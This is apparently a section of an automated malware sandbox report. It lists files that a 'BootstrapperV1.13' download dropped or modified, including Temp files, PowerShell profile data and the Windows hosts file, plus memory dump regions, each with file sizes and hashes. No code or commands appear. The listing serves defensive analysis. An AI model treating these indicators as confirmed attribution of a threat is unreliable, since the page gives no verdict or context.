d583a3e01aadbf8b1464af99eed565b73358d8e0418873efb7273ff72eb041f496446071ffe14970aab6873bde11b2e5820d33a18775cea31223c7020b661cc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9de528cab23a687528d40e7d4863427e

SHA1
27fb00ac7872fad0c1dba1c1071c946c4be60821

SHA256
84143fc034cadb25a535116a01da7243968a3e9c9b7bc5cde577f7b84d9c2365

SHA512
2fb29b6915338189833c665abd8128899178b448b106bba6859ec2abea176c06aa469d911f09f5fc8b5e36755471a1a970206ef8e12deaeeaa164fe9df4d3f1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca58d1913d3261f116a299095e04f734

SHA1
941d13d0c8c65adb6513f23991acfa0d62facdea

SHA256
755daf72f2f5e983abb009c3b1eef4c7c660999f5ff581545bbcae7088c17c69

SHA512
87b0d8c9a5348235e9ad6416e09665764db1af408bf763857dc40e39411fa0cf405e3e8b9f0b8540c72aa874059d1dee865aa0cff8dba0fde5779ec9480b5e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Temp\L2QDBxsY1aLp4q9

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vdw1PrA1A3I7k2e

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5ezkwh2.ly0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nFZBytpyDGi8kOF

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
7KB

MD5
4cffa5384db9684b221c7251b950f9bf

SHA1
8d18c04c5c3625de2541434ac74c7af1a343b6d0

SHA256
540e9ef0d4b2fb10a2e29f9998a719d17016c70571d96c9dd23457b568a88670

SHA512
3b1eb576726202bc2e7510e4de45f2c0185aafd936f7b3ee927c830503b6158e7568c2b064596afd827e78512f88bbb54a5b34f321f433914ffc5d7409914ef1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
10KB

MD5
f1f246e6ab288f6557c32b31c84379b5

SHA1
1b12239d0b603257c545847d824cea9665177c59

SHA256
7c5be1a0f2c2ab385d2ba2ed224d2ca94e4679fad47517165cb22237db129b1e

SHA512
45c8872f03b2340e6359edd3faff85b37f5552c7be9958f65343b00d733722b3421b09dd3960b7f1987df87db8df304a13721518644bc8c30aea9c70816709f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
13KB

MD5
a94fe19566c668f8e577140af3fe39bd

SHA1
6ec376967701c8ff2a48d05b34f8110f46a0abea

SHA256
32afbdf1203ebe6baffd763e44ca4fc90e724345ba2157f4a96db2a5357e5c25

SHA512
b36c5b355be11f10f1432c11574c373dd253401410ca9a9cd534418a2ec1c100a71b55aa33556e501d8ba67f333d51d35d1487c50e2f4985717a57505f6fb34f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
15KB

MD5
6e9f0185e16e3fd7cb4f5b4ea9e1caa7

SHA1
9609cc2eb0fc47d560ab5b997b7c57b228a9debb

SHA256
77855f4d13bcd87691caba2d98dcf06a7b2f35e1863df6770c42888baa518418

SHA512
e424e1def1d3d1072847744788483506d626359a06a45a2942e26b642058fe3ce25ed817a45c63f77183792891aab31e40e35b2163062997a5ca2138da1f4bf2

Download Submit
C:\Users\Admin\Downloads\BootstrapperV1.13.rar

Filesize
79KB

MD5
88e52f784ad35aff3b37046d8fc152a5

SHA1
d86313ca8a39d844f767d0f70de4bb68b8e2bb04

SHA256
683532c9ddccd09aac6480c255099963803eac956ea1d5597c772ff13a8a7a31

SHA512
82b9aae88dd61416e011f29d092201b0609c0e5d25126343062b548240e585ad1dcd01cbc73fbe0056becf3b060716cb56d35bba1080c441eb01e4c0b173d1c3

Download Submit
C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe

Filesize
229KB

MD5
224b37147484176752b12af33b9efd96

SHA1
d2fbb87ff49e0e80e8585b449fac349688d02f23

SHA256
2133a2c5f4a04d8ffe1ea436d035917ad16c50fa011b021c95c71f2660e67033

SHA512
e374e69dad1b3ad39887163e6c8cd07a88e36b167b91b0eeb8a5296f7345ea4c97e6e8e009193b321524f5326118900933e4657b0177b702036525d42c508704

Download Submit
C:\Users\Admin\Downloads\winrar-x64-701.exe

Filesize
3.8MB

MD5
46c17c999744470b689331f41eab7df1

SHA1
b8a63127df6a87d333061c622220d6d70ed80f7c

SHA256
c5b5def1c8882b702b6b25cbd94461c737bc151366d2d9eba5006c04886bfc9a

SHA512
4b02a3e85b699f62df1b4fe752c4dee08cfabc9b8bb316bc39b854bd5187fc602943a95788ec680c7d3dc2c26ad882e69c0740294bd6cb3b32cdcd165a9441b6

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/2936-1795-0x0000022A8C780000-0x0000022A8C7A2000-memory.dmp

Filesize
136KB

Download
memory/3380-2334-0x0000023F403E0000-0x0000023F403E1000-memory.dmp

Filesize
4KB

Download
memory/3380-2333-0x0000023F403E0000-0x0000023F403E1000-memory.dmp

Filesize
4KB

Download
memory/3380-2332-0x0000023F403D0000-0x0000023F403D1000-memory.dmp

Filesize
4KB

Download
memory/3380-2331-0x0000023F403D0000-0x0000023F403D1000-memory.dmp

Filesize
4KB

Download
memory/3380-2330-0x0000023F40340000-0x0000023F40341000-memory.dmp

Filesize
4KB

Download
memory/3380-2328-0x0000023F40340000-0x0000023F40341000-memory.dmp

Filesize
4KB

Download
memory/3380-2326-0x0000023F402C0000-0x0000023F402C1000-memory.dmp

Filesize
4KB

Download
memory/3380-2319-0x0000023F377A0000-0x0000023F377B0000-memory.dmp

Filesize
64KB

Download
memory/3380-2315-0x0000023F37760000-0x0000023F37770000-memory.dmp

Filesize
64KB

Download
memory/3988-1858-0x000001E665DE0000-0x000001E665DF2000-memory.dmp

Filesize
72KB

Download
memory/3988-1857-0x000001E665D90000-0x000001E665D9A000-memory.dmp

Filesize
40KB

Download
memory/3988-1824-0x000001E64BB80000-0x000001E64BB9E000-memory.dmp

Filesize
120KB

Download
memory/3988-1821-0x000001E665E90000-0x000001E665EE0000-memory.dmp

Filesize
320KB

Download
memory/3988-1820-0x000001E665E10000-0x000001E665E86000-memory.dmp

Filesize
472KB

Download
memory/3988-1792-0x000001E64B6B0000-0x000001E64B6F0000-memory.dmp

Filesize
256KB

Download